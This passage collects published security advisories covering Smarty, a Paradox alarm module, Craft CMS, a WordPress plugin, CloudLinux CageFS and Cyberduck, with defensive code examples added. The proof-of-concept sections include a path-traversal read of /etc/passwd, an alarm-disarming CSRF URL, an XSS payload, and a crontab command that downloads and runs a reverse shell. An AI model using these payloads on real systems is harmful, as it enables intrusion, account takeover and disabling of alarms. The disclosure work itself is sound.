* `2025-06-26` CVE ID assigned by GitHub
* `2025-06-26` Advisory published by project as `GHSA-hc8f-m8g5-8362`; the
  issue itself won't be fixed, but command execution has been disabled by
  default in version 2.33.8 as a workaround; GitHub issue #5199 opened to
  track the fix

## References ##

* Sandboxing Applications with Bubblewrap: Securing a Basic Shell:
* "Distroless" Container Images:
* GitHub Security Advisory:
* GitHub Issue:

## Credits ##

* Mathias Tausig ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2018/SBA-ADV-20180420-01_Smarty_Path_Traversal/README.md:
--------------------------------------------------------------------------------

# Smarty Trusted-Directory Bypass via Path Traversal #

## Vulnerability Overview ##

Smarty 3.1.32 or below is prone to a path traversal vulnerability due
to insufficient sanitization of code in Smarty templates. This allows
attackers controlling the Smarty template to bypass the trusted
directory security restriction and read arbitrary files.

* **Identifier** : SBA-ADV-20180420-01
* **Type of Vulnerability** : Path Traversal
* **Software/Product Name** : [Smarty](https://www.smarty.net/)
* **Vendor** : Smarty
* **Affected Versions** : 3.1.32 and probably prior
* **Fixed in Version** : 3.1.33
* **CVE ID** : CVE-2018-13982
* **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
* **CVSSv3 Base Score** : 8.6 (High)

## Vendor Description ##

> Smarty is a template engine for PHP, facilitating the separation of
> presentation (HTML/CSS) from application logic. This implies that PHP
> code is application logic, and is separated from the presentation.

Source:

## Impact ##

An attacker controlling the executed template code can read arbitrary
files accessible by the webserver by exploiting the vulnerability
documented in this advisory. Sensitive data such as database credentials
might get exposed through this attack.

We recommend upgrading to version 3.1.33 or newer.

## Vulnerability Description ##

Smarty allows restricting which paths are accessible during
template evaluation. This feature is implemented in the
`Smarty_Security` class and is enabled via the method `enableSecurity`.
However, the trusted directory check implemented in the method
`isTrustedResourceDir` of the `Smarty_Security` class is vulnerable to
path traversal.

The method `isTrustedResourceDir` first builds a list of allowed
directories in `$filepath` and then relies on the `_checkDir` method
to check if the requested resource dir is trusted. In version 0.3.31
neither `isTrustedResourceDir` nor `_checkDir` avoid path traversal:

```php
public function isTrustedResourceDir($filepath, $isConfig = null)
{
    [...]
    $this->_resource_dir = $this->_checkDir($filepath, $this->_resource_dir);
    return true;
}

private function _checkDir($filepath, $dirs)
{
    $directory = dirname($filepath) . DIRECTORY_SEPARATOR;
    $_directory = array();
    while (true) {
        // remember the directory to add it to _resource_dir in case we're successful
        $_directory[ $directory ] = true;
        // test if the directory is trusted
        if (isset($dirs[ $directory ])) {
            // merge sub directories of current $directory into _resource_dir to speed up subsequent lookup
            $dirs = array_merge($dirs, $_directory);
            return $dirs;
        }
        // abort if we've reached root
        if (!preg_match('#[\\\/][^\\\/]+[\\\/]$#', $directory)) {
            break;
        }
        // bubble up one level
        $directory = preg_replace('#[\\\/][^\\\/]+[\\\/]$#', DIRECTORY_SEPARATOR, $directory);
    }
    // give up
    throw new SmartyException("directory '{$filepath}' not allowed by security setting");
}
```

In version 0.3.32 `_checkDir` calls `_realpath` before checking if the
requested resource is trusted. However, the custom realpath method is
broken and allows path traversal at least on Unix systems.

For example, the fetch tag uses the `isTrustedResourceDir` method to
check if a user-specified path is allowed to read.
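`_checkDir` above bubbles up the path lexically, so a `..` component in `$filepath` is never collapsed before the directory is compared against the trusted list. As an added example (not Smarty's code, and a Python model rather than a PHP patch), the block below shows the check done the robust way: canonicalize both the requested path and every trusted directory first, then compare whole path components. The trusted directory `/var/www/templates` and the function names are assumptions made for this example; the traversal path is the one from the proof of concept that follows.

```python
# Added example (not Smarty's code): a trusted-directory check that
# canonicalizes before comparing, so neither '..' traversal nor a
# prefix collision such as 'templates_evil/' passes.
import os
from typing import Iterable


def canonical(path: str) -> str:
    """Absolute path with symlinks (where components exist) and '..' resolved."""
    return os.path.realpath(os.path.abspath(path))


def is_trusted_resource(path: str, trusted_dirs: Iterable[str]) -> bool:
    """True if `path` lies inside one of `trusted_dirs` after canonicalization."""
    target = canonical(path)
    for trusted in trusted_dirs:
        base = canonical(trusted)
        try:
            # commonpath compares component-wise, so '/var/www/templates_evil'
            # does not share the component '/var/www/templates' with the base.
            if os.path.commonpath([base, target]) == base:
                return True
        except ValueError:  # paths on different drives (Windows): not trusted
            continue
    return False


def check_fetch_path(path: str) -> bool:
    """Decision for a fetch-tag path against the single constructed trusted dir."""
    return is_trusted_resource(path, ["/var/www/templates"])


if __name__ == "__main__":
    for candidate in (
        "/var/www/templates/pages/index.tpl",
        "/var/www/templates/../../../../../etc/passwd",
        "/var/www/templates_evil/index.tpl",
    ):
        print(candidate, "->", "trusted" if check_fetch_path(candidate) else "rejected")
```

Canonicalizing both sides is what keeps the check correct when a trusted directory is itself reached through a symlink; comparing components rather than string prefixes is what stops `templates_evil` from matching `templates`. A `..` that stays inside the trusted tree is still accepted, so the check does not have to forbid `..` outright.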

## Proof-of-Concept ##

An attacker can exploit this vulnerability by using the `fetch` tag:

```php
{fetch file="/var/www/templates/../../../../../etc/passwd"}
```

Full example:

```php
<?php
[...]
$smarty->enableSecurity();
// Fails
//$smarty->display('eval:{fetch file="/etc/passwd"}');
// Works
$smarty->display('eval:{fetch file="'.addslashes(getcwd()).'/templates/../../../../../etc/passwd"}');
```

## Timeline ##

* `2018-04-20`: identification of vulnerability in version 3.1.31
* `2018-04-23`: initial vendor contact
* `2018-04-23`: disclosed vulnerability to vendor
* `2018-04-24`: vendor acknowledged vulnerability and released version 3.1.32
* `2018-04-25`: notified vendor about incomplete fix
* `2018-04-26`: vendor fixed vulnerability
* `2018-07-10`: request CVE from MITRE
* `2018-07-11`: MITRE assigned CVE-2018-13982
* `2018-09-12`: vendor released fix in version 3.1.33
* `2018-09-17`: public disclosure

## References ##

* Changelog:
* Patches:

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
* Thomas Konrad ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2024/SBA-ADV-20240321-01_Paradox_Cross_Site_Request_Forgery/README.md:
--------------------------------------------------------------------------------

# Paradox IP150 Internet Module Cross-Site Request Forgery #

## Vulnerability Overview ##

The Paradox IP150 Internet Module in version 1.40.00 is vulnerable to
Cross-Site Request Forgery (CSRF) attacks due to a lack of countermeasures
and the use of the HTTP method `GET` to introduce changes in the system.

* **Identifier** : SBA-ADV-20240321-01
* **Type of Vulnerability** : Cross-Site Request Forgery (CSRF)
* **Software/Product Name** : [IP150 Internet Module](https://www.paradox.com/Products/default.asp?CATID=3&SUBCATID=38&PRD=563)
* **Vendor** : [Paradox Security Systems (Bahamas) Ltd.](https://www.paradox.com/)
* **Affected Versions** : 1.40.00 (possibly others too)
* **Fixed in Version** : Not yet
* **CVE ID** : CVE-2024-5676
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H
* **CVSS Base Score** : 6.8 (Medium)

## Vendor Description ##

> IP150
> Internet Module
> Supports SWAN Server
>
> Features
>
> * Controls and monitors a control panel through an IP network (LAN / WAN / Internet)
> * Reports control panel events via IP to the Paradox IPR512 GPRS / IP Monitoring Receiver and / or IPRS-7 GPRS / IP PC Receiver Software
> * Two I/Os on board; controlled via the web interface, triggering an email
> * Sends notification and alarm system events via email
> * Arm / Disarm individual partitions via Insite GOLD app
> * Connects to Swan for easy installation (no port forwarding)
> * Enables Insite GOLD, or BabyWare to access your system through the Internet
> * Push notification to Insite GOLD app
> * HTTPS support for improving security (HyperText Transfer Protocol Secure; a widely used communications protocol for secure communication over a computer network)
> * Very low bandwidth consumption
> * Easy installation; built-in clip for mounting in a metal box
> * Supported language: English
> * Compatible with EVO Series, Spectra SP Series, MG5000, MG5050 and MG5075

Source:

## Impact ##

An attacker can coerce an administrator into clicking a link, which issues
an HTTP request that changes the state of the system.
Depending on the configuration, meaning which downstream component is
controlled by the affected component, the impact differs. For example,
the *IP150 Internet Module* might control an alarm unit; an attacker can
then deactivate the alarm by performing a CSRF attack.

## Vulnerability Description ##

The server cannot verify whether a request was sent intentionally. This
makes it possible for an attacker to trick a client into making
unintentional requests to the web server, which are treated as
authentic requests. In combination with a social engineering attack,
this allows an attacker to perform server-side actions as the victim.

In addition, the functionality for activating and deactivating the alarm
system is accessed via an HTTP `GET` request. Changing the state of the
server with `GET` is discouraged by the HTTP standard, since `GET` is
defined to be a *safe* method [1]. This makes exploitation of the
vulnerability easier, as an attacker only needs to craft a URL. If the
victim opens this URL, the CSRF attack is carried out and the action is
performed.

## Proof of Concept ##

For example, the following HTTP request disables the alarm in area `00`:

```http
GET /statuslive.html?area=00&value=d HTTP/1.1
Host: 192.0.2.1
```

It is vulnerable to CSRF, since the application does not apply any CSRF
countermeasures. Therefore, it is possible to craft a URL that performs
this action:

```text
http://192.0.2.1/statuslive.html?area=00&value=d
```

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

A generally valid solution against CSRF, which however requires
server-side state, is the implementation of an unpredictable token that
is unique for each session.
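As an added illustration of that countermeasure (example code written for this write-up, not the IP150 firmware or any vendor code), the handler below models the disarm action from the proof of concept once as the affected `GET` endpoint and once behind a per-session synchronizer token. The session store, the `area`/`value` parameter handling and the status codes are assumptions of the example.

```python
import hmac
import secrets

# In-memory session store for this constructed example; a real application
# keeps the same data server-side, keyed by the session cookie.
SESSIONS = {}


def new_session():
    """Create a session with its own unpredictable CSRF token and one armed area."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = {
        "csrf_token": secrets.token_urlsafe(32),
        "areas": {"00": "armed"},
    }
    return session_id


def csrf_token_for(session_id):
    # The page that renders the disarm form embeds this value in a hidden field;
    # a cross-site page cannot read it, so it cannot forge a valid request.
    return SESSIONS[session_id]["csrf_token"]


def area_state(session_id, area):
    return SESSIONS[session_id]["areas"][area]


def handle_vulnerable(session_id, method, query):
    """Shape of the affected endpoint: a GET whose query string changes state,
    with nothing that ties the request to the user's intent. Returns an HTTP
    status code."""
    session = SESSIONS[session_id]
    if method == "GET" and query.get("value") == "d" and query.get("area") in session["areas"]:
        session["areas"][query["area"]] = "disarmed"
        return 200
    return 400


def handle_hardened(session_id, method, form):
    """Same action behind two checks: state changes only over POST, and only
    when the submitted token matches the session's token (compared in constant
    time). A forged cross-site request fails one of the two."""
    session = SESSIONS[session_id]
    if method != "POST":
        return 405
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return 403
    if form.get("value") == "d" and form.get("area") in session["areas"]:
        session["areas"][form["area"]] = "disarmed"
        return 200
    return 400
```

Moving the action to `POST` alone removes the "just click a link" vector but not CSRF itself, since a hidden auto-submitting form can still post; the token is what makes the request unforgeable.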
The OWASP project gives further recommendations [2] [3].

## Timeline ##

* `2024-02-09` Identified the vulnerability in version 1.40.00
* `2024-02-12` First contact to the system owner to acquire more information about the system configuration and version
* `2024-03-08` System owner provided all details on the affected system
* `2024-03-21` First attempt to contact vendor via support email
* `2024-04-03` Second attempt to contact vendor via web form and support email
* `2024-06-19` No reaction from vendor to all previous contact attempts
* `2024-06-19` SBA Research assigned CVE-2024-5676
* `2024-06-19` Public disclosure

## References ##

1. RFC 7231. HTTP/1.1 Semantics and Content. Safe Methods:
2. OWASP Cheat Sheet Series. Cross-Site Request Forgery Prevention Cheat Sheet:
3. OWASP Web Security Testing Guide (WSTG) v4.2. Testing for Cross Site Request Forgery:

## Credits ##

* Jakob Pachmann ([SBA Research](https://www.sba-research.org/))
* Fabian Funder ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2024/SBA-ADV-20240617-01_CraftCMS_TOTP_Valid_After_Use/README.md:
--------------------------------------------------------------------------------

# Craft CMS - TOTP Token Stays Valid After Use #

## Vulnerability Overview ##

Craft CMS from version 5.0.0-beta.1 through 5.2.2 allows a TOTP token to be
reused multiple times within its validity period.

* **Identifier** : SBA-ADV-20240617-01
* **Type of Vulnerability** : Improper Authentication
* **Software/Product Name** : [Craft CMS](https://craftcms.com)
* **Vendor** : [Pixel & Tonic, Inc.](https://pixelandtonic.com)
* **Affected Versions** : >= 5.0.0-beta.1, <= 5.2.2
* **Fixed in Version** : 5.2.3
* **CVE ID** : CVE-2024-41800
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N
* **CVSS Base Score** : 4.8 (Medium)

## Vendor Description ##

> Craft is a flexible, user-friendly CMS for creating custom digital
> experiences on the web and beyond.

Source:

## Impact ##

An attacker is able to re-submit a valid TOTP token to establish an
authenticated session. This requires that the attacker has knowledge of the
victim's credentials.

## Vulnerability Description ##

A TOTP token can be used multiple times to establish an authenticated session.
RFC 6238 requires that an OTP must not be used more than once [1]:

> The verifier MUST NOT accept the second attempt of the OTP after the
> successful validation has been issued for the first OTP, which ensures
> one-time only use of an OTP.

The OWASP Application Security Verification Standard v4.0.3 (ASVS) reiterates
this property with requirement 2.8.4 [2]:

> Verify that time-based OTP can be used only once within the validity period.

It should also be noted that the validity period of a TOTP token is 2
minutes. This makes a successful brute force attack more likely, since four
tokens are valid at the same time.

## Proof of Concept ##

Start the login process in two different environments, e.g. in two different
browsers. Enter the same TOTP in both environments while making sure that
both submissions are made within the timespan in which the TOTP is valid.
Both environments should display the dashboard, signaling that the
authentication process has been successful.

The following request and response pairs show this behavior. The requests are
made from different sessions (different `CraftSessionId` cookie), but yield
the same response. Therefore, the one-time use requirement of TOTPs has been
shown to be violated.

Request and response 1:

```http
POST /index.php?p=admin%2Factions%2Fauth%2Fverify-totp&v=1718611475335 HTTP/1.1
Host: example.com
Cookie: CraftSessionId=f52a55[...]; CRAFT_CSRF_TOKEN=84046fab20[...]; b355f5550c68c4120bf669f0e80588c6_username=677791f5[...];
X-Requested-With: XMLHttpRequest
X-Csrf-Token: 3jS9tkBnKBRDJ[...]
Content-Length: 17
Connection: close

{"code":"101472"}

HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Date: Mon, 17 Jun 2024 08:04:35 GMT
[...]

{"message":"Verification successful."}
```

Request and response 2:

```http
POST /index.php?p=admin%2Factions%2Fauth%2Fverify-totp&v=1718611477246 HTTP/1.1
Host: example.com
Cookie: CraftSessionId=221f47[...]; CRAFT_CSRF_TOKEN=2db430[...]; b355f5550c68c4120bf669f0e80588c6_username=677791[...];
X-Requested-With: XMLHttpRequest
X-Csrf-Token: Raz6Fv[...]
Content-Length: 17
Connection: close

{"code":"101472"}

HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Date: Mon, 17 Jun 2024 08:04:37 GMT

[...]

{"message":"Verification successful."}
```

## Recommended Countermeasures ##

We recommend updating to version 5.2.3 or later, which applies the following
countermeasure.

We suggest that TOTPs should lose their validity after they have been used
and only newer tokens should be accepted.
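The following example (added to this advisory; it is not Craft CMS or Google2FA code) implements RFC 6238 TOTP verification twice: once accepting any code inside the validity window, which is the reusable behaviour shown above, and once remembering the time step of the last accepted code and refusing anything at or before it. The window size, the class name `TotpVerifier` and the use of the RFC 4226/6238 test secret are assumptions of the example.

```python
import hashlib
import hmac
import struct

TIME_STEP = 30  # seconds per time step, the RFC 6238 default


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the big-endian 8-byte counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, timestamp, digits=6):
    """RFC 6238: HOTP with the counter derived from Unix time."""
    return hotp(secret, timestamp // TIME_STEP, digits)


class TotpVerifier:
    """One user's verifier. `window` is the number of steps accepted on either
    side of the current one (an assumption of the example; a multi-minute
    validity period means several steps are valid at once)."""

    def __init__(self, secret, window=2):
        self.secret = secret
        self.window = window
        self.last_step = None  # time step of the last code that was accepted

    def _matching_step(self, code, now):
        current = now // TIME_STEP
        for step in range(max(0, current - self.window), current + self.window + 1):
            if hmac.compare_digest(hotp(self.secret, step).encode(), code.encode()):
                return step
        return None

    def verify_replayable(self, code, now):
        """Vulnerable shape: a code is good as long as it falls inside the
        window, however often it is submitted."""
        return self._matching_step(code, now) is not None

    def verify_once(self, code, now):
        """Hardened shape: additionally remember the step of the last accepted
        code and refuse anything at or before it, so a re-submitted (or older)
        code is dead after the first successful use."""
        step = self._matching_step(code, now)
        if step is None:
            return False
        if self.last_step is not None and step <= self.last_step:
            return False
        self.last_step = step
        return True
```

`last_step` has to live in server-side storage shared by all sessions of the user (for example the user record), because the proof of concept submits the same code from two independent sessions; a per-session record would not catch it.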
The `Google2FA` library, which is already in use, provides such
functionality [3]:

> An attacker might be able to watch the user entering his credentials and
> one time key. Without further precautions, the key remains valid until it
> is no longer within the window of the server time. In order to prevent
> usage of a one time key that has already been used, you can utilize the
> `verifyKeyNewer` function.

## Timeline ##

* `2024-06-17`: Identified the vulnerability in version 5.1.8
* `2024-06-17`: Contacted the vendor and disclosed the vulnerability
* `2024-06-20`: Started to collaborate with the vendor on a GitHub Security Advisory (GHSA)
* `2024-06-20`: Release of fixed version 5.2.3
* `2024-07-25`: Public disclosure of GHSA
* `2024-07-25`: Public disclosure of SBA-ADV

## References ##

1. RFC 6238. TOTP: Time-Based One-Time Password Algorithm:
2. OWASP Application Security Verification Standard (ASVS) v4.0.3. Requirement 2.8.4 Verify that time-based OTP can be used only once within the validity period:
3. Google2FA. Validation Window:
4. GitHub Security Advisory. TOTP Token Stays Valid After Use:

## Credits ##

* Fabian Funder ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2019/SBA-ADV-20190913-03_WordPress_Plugin_Events_Manager/README.md:
--------------------------------------------------------------------------------

# WordPress Plugin - Events Manager - Stored XSS #

## Vulnerability Overview ##

The events-manager plugin through 5.9.5 for WordPress (aka Events Manager)
is susceptible to Stored XSS due to improper encoding and insertion of
data provided to the attribute `map_style` of the shortcodes `locations_map`
and `events_map` provided by the plugin.

* **Identifier** : SBA-ADV-20190913-03
* **Type of Vulnerability** : Cross-site Scripting
* **Software/Product Name** : [Events Manager](https://wordpress.org/plugins/events-manager/)
* **Vendor** : [Marcus Sykes](https://wp-events-plugin.com)
* **Affected Versions** : <= 5.9.5
* **Fixed in Version** : 5.9.6
* **CVE ID** : CVE-2019-16523
* **CVSSv3 Vector** : AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
* **CVSSv3 Base Score** : 7.3 (High)

## Vendor Description ##

> Events Manager is a full-featured event registration plugin for WordPress based on the principles of flexibility, reliability and powerful features!
>
> Version 5 now makes events and locations WordPress Custom Post Types, allowing for more possibilities than ever before!

Active Installations: 100,000+

Source:

## Impact ##

By exploiting the documented vulnerability, an authenticated attacker with the
ability to create posts can execute JavaScript code in a victim's browser.
This can be misused, e.g. for phishing attacks by displaying a fake
login form and sending the victim's credentials to the attacker.
Furthermore, malicious actions can be performed in the context of an
authenticated user. The impact depends on the level of access of the attacked
user. In case of an admin this can lead to the execution of PHP code and the
compromise of the server.

## Vulnerability Description ##

The plugin provides [*shortcodes*][1] to create a map widget, e.g. for
displaying the location of an event. Those maps can be visually adjusted by
providing a custom style via the attribute `map_style` in the shortcode. The
usage of HTML inside shortcode attributes is [limited][2] in order to prevent
XSS.
However, in this case it is possible to inject arbitrary HTML and JavaScript
because the `map_style` attribute expects a base64-encoded JSON object, which
bypasses the sanitization. The shortcodes `locations_map` and `events_map` are
affected by this problem.

In `em-shortcode.php` (line 43-56) we can see that the attribute is
base64-decoded and then parsed with `json_decode`. If the JSON syntax is
valid, whitespace is removed and the string is passed to the template as the
`map_json_style` variable. See the code snippet below:

```php
//add JSON style to map
$style = '';
if( !empty($args['map_style']) ){
    $style= base64_decode($args['map_style']);
    $style_json= json_decode($style);
    if( is_array($style_json) || is_object($style_json) ){
        $style = preg_replace('/[\r\n\t\s]/', '', $style);
    }else{
        $style = '';
    }
    unset($args['map_style']);
}
ob_start();
em_locate_template('templates/map-global.php',true, array('args'=>$args, 'map_json_style' => $style));
```

In `templates/templates/map-global.php` (line 16-21) the variable is inserted
inside a script tag without further encoding:

```php
```

This allows the injection of an XSS payload.

[1]: https://codex.wordpress.org/Shortcode_API
[2]: https://codex.wordpress.org/Shortcode_API#HTML

## Proof of Concept ##

To exploit this vulnerability an attacker needs to create or edit a post
and insert one of the shortcodes mentioned above.
In this example we use the `locations_map` shortcode and set the attribute
`map_style` to the base64-encoded value of
`{"a":"test\"</script><script>alert(1)</script>"}`.
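The following Python model (added for this advisory; it is not the plugin's code) reproduces the decoding step above with the same JSON value, renders it into a script block once verbatim and once with the characters `<`, `>` and `&` escaped as JavaScript unicode escapes, and checks whether the script element was terminated early. The function names and the `map_style` variable name in the rendered block are assumptions of the example.

```python
import base64
import json

# Constructed payload: the JSON value used in the proof of concept.
PAYLOAD_JSON = '{"a":"test\\"</script><script>alert(1)</script>"}'


def encode_map_style(json_text):
    """What is supplied as the shortcode attribute value."""
    return base64.b64encode(json_text.encode("utf-8")).decode("ascii")


def decode_map_style(b64_value):
    """Mirror of the plugin's handling: base64-decode, require that the result
    parses as a JSON object or array, strip whitespace from the *raw text* and
    hand that text on. The check only proves the text is syntactically valid
    JSON; it says nothing about what the JSON strings contain."""
    try:
        raw = base64.b64decode(b64_value, validate=True).decode("utf-8")
        parsed = json.loads(raw)
    except (ValueError, UnicodeDecodeError):
        return ""
    if not isinstance(parsed, (dict, list)):
        return ""
    return "".join(ch for ch in raw if ch not in "\r\n\t ")


def render_vulnerable(style):
    """Template behaviour described above: the text lands inside <script> unchanged."""
    return "<script>\n  var map_style = " + style + ";\n</script>"


def render_hardened(style):
    """Re-serialise the parsed value and escape '<', '>' and '&' as JS unicode
    escapes, so the browser's HTML parser never sees '</script>' inside the
    block. The result is still valid JSON and valid JavaScript."""
    value = json.loads(style) if style else None
    safe = (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))
    return "<script>\n  var map_style = " + safe + ";\n</script>"


def script_closed_early(html):
    """Defender-side check: more than one '</script' in the rendered block means
    the injected data terminated the script element."""
    return html.lower().count("</script") > 1
```

The HTML parser looks for `</script` inside a script element before the JavaScript engine ever sees the string, which is why JSON validity is no protection; in PHP the same escaping is obtained from `json_encode()` with the `JSON_HEX_TAG` and `JSON_HEX_AMP` flags.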
Base64-encoding that JSON value gives the following shortcode:

```text
[locations_map test="" map_style="eyJhIjoidGVzdFwiPC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9Cg=="]
```

This shortcode can then be inserted in a post and published by a malicious user.
Anyone visiting the post is affected by the payload and therefore a victim of
the XSS attack.

## Recommended Countermeasures ##

We recommend properly escaping the output by using the encoding functions
provided by WordPress, such as the `esc_*` or `wp_kses_*` [functions][3].

[3]: https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output

## Timeline ##

* `2019-09-09` Identified the vulnerability
* `2019-09-10` Contacted vendor
* `2019-09-10` Response by vendor about disclosure contact
* `2019-09-10` Vulnerability disclosed to vendor
* `2019-09-10` Vulnerability verified by vendor, public disclosure coordinated
* `2019-09-20` CVE assigned
* `2019-09-23` Suggested fix verified
* `2019-09-27` Plugin update containing fix was released
* `2019-10-16` Public disclosure

## Credits ##

* Tobias Fink ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure/README.md:
--------------------------------------------------------------------------------

# CloudLinux CageFS Token Disclosure #

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a
command line argument. In some configurations this allows local users to
view the authentication token via the process list and gain code execution
as another user.

* **Identifier** : SBA-ADV-20200707-01
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor** : CloudLinux Inc.
* **Affected Versions** : <= 7.1.1-1
* **Fixed in Version** : 7.1.2-2
* **CVE ID** : CVE-2020-36771
* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* **CVSS Base Score** : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves
> server stability, density, and security by isolating each tenant and
> giving them allocated server resources. This creates an environment
> that feels more like a virtual server than a shared hosting account.
> By doing so, CloudLinux OS reduces operating costs and churn rates,
> and increases profitability.

Source:

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem
feature is disabled, a local user can obtain the CageFS authentication
token of other users by exploiting the vulnerability documented in this
advisory. In most configurations this allows attackers to gain code
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.
It allows limited execution of commands outside the CageFS environment by
a user restricted within the CageFS environment.

For this purpose a CageFS daemon runs outside of the CageFS environment;
it is accessible via a UNIX socket from within the CageFS environment.
The UNIX socket is handled by `proxyexec`.
To make the whole process of calling a tool outside of CageFS transparent
to the user, wrapper scripts are placed within CageFS, which in turn call
`proxyexec` to execute the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which
prevents other users from seeing the CageFS token within the process
list. However, if the `lve_namespaces` service is disabled, e.g. because the
systemd unit is masked, or the virtualized proc filesystem is explicitly
disabled, other users can see the CageFS token within the process list.
They can use the CageFS token of other users to talk to the CageFS daemon
via `proxyexec`, and the CageFS daemon executes the commands with the
privileges of the user the supplied authentication token belongs to.

## Proof of Concept ##

Let's assume the `lve_namespaces` service is disabled and we are user
`ftp2406151`:

```sh
$ id
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)
```

We inspect the process list and find another user executing `ping example.org`:

```sh
$ ps aux | grep proxyexec
2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org
1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1181229 ftp24061 0:00 grep proxyexec
```

We can now execute commands as user `ftp1488781` and, for example, view
the crontab:

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
no crontab for ftp1488781
```

Now we set up a new crontab entry, which downloads a reverse shell and
executes it every minute:

```sh
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0
```

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &
```

Our shell connects back to us and we can execute arbitrary commands as
the other user:

```sh
$ nc -l -p 1234
id
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)
```

## Recommended Countermeasures ##

We recommend avoiding passing sensitive information as a command line
argument. Instead, `proxyexec` should directly read the CageFS token
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1
* `2020-07-10`: initial vendor contact
* `2020-07-13`: initial vendor response
* `2020-07-13`: disclosed vulnerability to vendor security contact
* `2020-09-02`: vendor released version 7.1.2-2 to testing
* `2020-09-28`: vendor released version 7.1.2-2 to production
* `2020-10-02`: request CVE from MITRE
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat
* `2024-01-19`: request CVE from Red Hat
* `2024-01-22`: Red Hat assigned CVE-2020-36771
* `2024-01-25`: public disclosure

## References ##

* CloudLinux OS Documentation.
  Virtualized /proc filesystem:
* CageFS 7.1.2-2 beta:
* CageFS 7.1.2-2 production:

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/README.md:
--------------------------------------------------------------------------------

# Cyberduck and Mountain Duck - Weak Hash Algorithm for Certificate Fingerprint #

## Vulnerability Overview ##

Cyberduck and Mountain Duck improperly handle TLS certificate pinning for
untrusted certificates (e.g., self-signed), since the certificate
fingerprint is stored as SHA-1, although SHA-1 is considered weak and
should be replaced with SHA-256 or SHA-512.

* **Identifier** : SBA-ADV-20250325-02
* **Type of Vulnerability** : CWE-328: Use of Weak Hash
* **Software/Product Name** : [Cyberduck](https://cyberduck.io/) and [Mountain Duck](https://mountainduck.io/)
* **Vendor** : [iterate GmbH](https://iterate.ch/)
* **Affected Versions** : Cyberduck <= 9.1.6 and Mountain Duck <= 4.17.5
* **Fixed in Version** : Cyberduck 9.1.7 and Mountain Duck 4.17.6
* **CVE ID** : CVE-2025-41256
* **GHSA** : GHSA-688c-vjrc-84rv
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
* **CVSS Base Score** : 7.4 (High)

## Vendor Description ##

> Cyberduck is a libre server and cloud storage browser for Mac and Windows
> with support for FTP, SFTP, WebDAV, Amazon S3, OpenStack Swift, Backblaze
> B2, Microsoft Azure & OneDrive, Google Drive and Dropbox.

Source:

> Mountain Duck lets you mount server and cloud storage as a disk in Finder
> on macOS and the File Explorer on Windows. Open remote files with any
> application and work like on a local volume.

Source:

## Impact ##

As only the SHA-1 fingerprint of the certificate is stored and SHA-1 is
considered weak, an attacker could provoke a hash collision and thus perform
